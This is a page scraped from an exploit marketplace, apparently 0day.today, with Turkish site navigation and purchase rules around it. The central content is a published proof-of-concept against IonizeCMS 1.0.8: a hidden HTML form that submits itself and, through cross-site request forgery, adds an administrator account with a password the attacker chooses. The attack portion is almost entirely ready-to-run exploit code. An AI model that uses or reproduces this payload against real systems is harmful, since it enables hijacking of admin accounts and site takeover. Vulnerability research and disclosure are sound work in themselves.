0day.today - Dunyanin En Buyuk Exploit Veritabani
![](/img/logo_green.jpg)
Biz sadece bir adet ana domain kullaniyoruz DOMAIN_LINK
Eger exploit satin alacaksaniz ve ya hizmet icin odeme yapacaksaniz, altin almaniz gerekmekte. Biz sitemizi hack amacli kullanmak istemiyoruz, yani her turlu dogru olmayan, kanunsuz ve illegal yapilan eylemler diger hesaplari olumsuz yonde etkileyebilir ve sonrasinda buna yol acan/lar, web sitelerimize ve verilere erisimi tamamen kesilir, banlanir ve hesabini tarafimizca yok edilir.
Sadece bu sitenin yonetimine itibar edin. Sahtelere Dikkat!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Oku [ anlasma ]
- Oku [ Gonder ] kurallar
- Ziyaret et [ SSS ] page
- [ Uye Ol ] profil
- [ FIYAT ]
- Eger istiyorsaniz [ satmak ]
- Eger istiyorsaniz [ almak ]
- Eger kaybederseniz [ Hesap ]
- Herhangi bir sorunuz [ [email protected] ]
- Yetkili sayfa
- Uyelik sayfasi
- Hesap sayfasini geri yukle
- SSS sayfasi
- Iletisim sayfasi
- Paylasim kurallari
- Anlasma sayfasi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bize ulasabilirsiniz:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
IonizeCMS 1.0.8 - Cross-Site Request Forgery (Add Admin)
<!-- # Exploit Title: IonizeCMS <= 1.0.8 Remote Admin Add CSRF Exploit # Exploit Author: s0nk3y # Google Dork: - # Date: 21/06/2016 # Vendor Homepage: http://ionizecms.com/ # Software Link: https://github.com/ionize/ionize/archive/1.0.8.1.zip # Version: 1.0.8 # Tested on: Ubuntu 16.04 IonizeCMS is vulnerable to CSRF attack (No CSRF token in place) meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), a form will be submitted to (http://localhost/en/admin/user/save) that will add a new user as administrator. Once exploited, the attacker can login to the admin panel ( http://localhost/en/admin/auth/login) using the username and the password he posted in the form. CSRF PoC Code ============= --> <form method="post" action="http://localhost/en/admin/user/save"> <input type="hidden" name="id_user"/> <input type="hidden" name="join_date"/> <input type="hidden" name="salt"/> <input type="hidden" name="from"/> <input type="hidden" name="username" value="attacker"> <input type="hidden" name="screen_name" value="attacker"> <input type="hidden" name="email" value="[email protected]"/> <input type="hidden" name="id_role" value="2"/> <input type="hidden" name="password" value="attackerPassword"/> <input type="hidden" name="password2" value="attackerPassword"/> </form> <script> document.forms[0].submit(); </script> # 0day.today [2024-07-02] #